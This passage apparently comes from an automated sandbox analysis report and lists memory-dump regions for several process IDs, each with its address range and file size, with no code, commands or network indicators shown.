                                                                                                                            • memory/1840-35-0x0000000005BB0000-0x0000000005C16000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              408KB

                                                                                                                            • memory/1840-49-0x00000000066A0000-0x00000000066BA000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              104KB

                                                                                                                            • memory/1840-47-0x0000000006710000-0x000000000675C000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              304KB

                                                                                                                            • memory/1840-31-0x00000000028F0000-0x0000000002926000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              216KB

                                                                                                                            • memory/1840-51-0x00000000078D0000-0x0000000007E74000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              5.6MB

                                                                                                                            • memory/1840-33-0x0000000005270000-0x0000000005292000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              136KB

                                                                                                                            • memory/1840-50-0x0000000006760000-0x0000000006782000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              136KB

                                                                                                                            • memory/1840-45-0x0000000005C20000-0x0000000005F74000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              3.3MB

                                                                                                                            • memory/2100-162-0x0000000005190000-0x00000000051DC000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              304KB

                                                                                                                            • memory/2100-161-0x0000000004620000-0x0000000004974000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              3.3MB

                                                                                                                            • memory/2212-193-0x0000000000400000-0x0000000001058000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              12.3MB

                                                                                                                            • memory/2212-130-0x0000000000400000-0x0000000001058000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              12.3MB

                                                                                                                            • memory/2212-140-0x0000000000400000-0x0000000001058000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              12.3MB

                                                                                                                            • memory/2892-661-0x0000000003DE0000-0x0000000003E6C000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              560KB

                                                                                                                            • memory/2892-675-0x0000000003E70000-0x0000000003F49000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              868KB

                                                                                                                            • memory/2892-244-0x0000000000720000-0x0000000000DD5000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              6.7MB

                                                                                                                            • memory/2892-280-0x0000000002C70000-0x0000000002CF5000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              532KB

                                                                                                                            • memory/2892-627-0x0000000000720000-0x0000000000DD5000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              6.7MB

                                                                                                                            • memory/2892-321-0x0000000003380000-0x00000000033EA000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              424KB

                                                                                                                            • memory/2892-258-0x0000000010000000-0x0000000010C29000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              12.2MB

                                                                                                                            • memory/3080-230-0x0000000072520000-0x000000007264C000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              1.2MB

                                                                                                                            • memory/3080-229-0x0000000000C30000-0x0000000000C41000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              68KB

                                                                                                                            • memory/3248-271-0x0000000005670000-0x00000000056BC000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              304KB

                                                                                                                            • memory/3656-5-0x00007FFDA4953000-0x00007FFDA4955000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              8KB

                                                                                                                            • memory/3656-753-0x00007FFDA4950000-0x00007FFDA5411000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/3656-0-0x00007FFDA4953000-0x00007FFDA4955000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              8KB

                                                                                                                            • memory/3656-1-0x0000000000DD0000-0x0000000000DD8000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              32KB

                                                                                                                            • memory/3656-2-0x00007FFDA4950000-0x00007FFDA5411000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/3656-6-0x00007FFDA4950000-0x00007FFDA5411000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/3708-213-0x000001A8C1910000-0x000001A8C1932000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              136KB

                                                                                                                            • memory/3792-472-0x0000000000400000-0x00000000004BD000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              756KB

                                                                                                                            • memory/3792-228-0x0000000000400000-0x00000000004BD000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              756KB

                                                                                                                            • memory/3792-132-0x0000000000400000-0x00000000004BD000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              756KB

                                                                                                                            • memory/3820-70-0x0000000006D70000-0x0000000006DBC000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              304KB

                                                                                                                            • memory/3820-68-0x0000000006160000-0x00000000064B4000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              3.3MB

                                                                                                                            • memory/4040-55-0x0000000010000000-0x0000000010C29000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              12.2MB

                                                                                                                            • memory/4040-104-0x0000000000130000-0x00000000007E5000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              6.7MB

                                                                                                                            • memory/4040-30-0x0000000000130000-0x00000000007E5000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              6.7MB

                                                                                                                            • memory/4732-173-0x0000000010000000-0x0000000010C29000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              12.2MB

                                                                                                                            • memory/4732-151-0x0000000000130000-0x00000000007E5000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              6.7MB

                                                                                                                            • memory/4732-226-0x0000000000130000-0x00000000007E5000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              6.7MB

                                                                                                                            • memory/4924-198-0x00000000046E0000-0x0000000004A34000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              3.3MB

                                                                                                                            • memory/4924-688-0x0000000001E10000-0x0000000002A39000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              12.2MB

                                                                                                                            • memory/4924-209-0x00000000051D0000-0x000000000521C000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              304KB

                                                                                                                            • memory/4968-148-0x0000000000400000-0x0000000000701000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              3.0MB

                                                                                                                            • memory/4968-133-0x0000000000400000-0x0000000000701000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              3.0MB

                                                                                                                            • memory/4968-127-0x0000000000400000-0x0000000000701000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              3.0MB

                                                                                                                            • memory/4968-126-0x0000000000400000-0x0000000000701000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              3.0MB

                                                                                                                            • memory/4968-641-0x0000000000710000-0x00000000007B2000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              648KB

                                                                                                                            • memory/4968-241-0x0000000000400000-0x0000000000701000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              3.0MB

                                                                                                                            • memory/4968-626-0x0000000000400000-0x0000000000701000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              3.0MB

                                                                                                                            • memory/4968-192-0x0000000000400000-0x0000000000701000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              3.0MB

                                                                                                                            • memory/4968-231-0x0000000000400000-0x0000000000701000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              3.0MB

                                                                                                                            • memory/4968-759-0x0000000000400000-0x0000000000701000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              3.0MB

                                                                                                                            • memory/5084-131-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              80KB

                                                                                                                            • memory/5084-91-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              80KB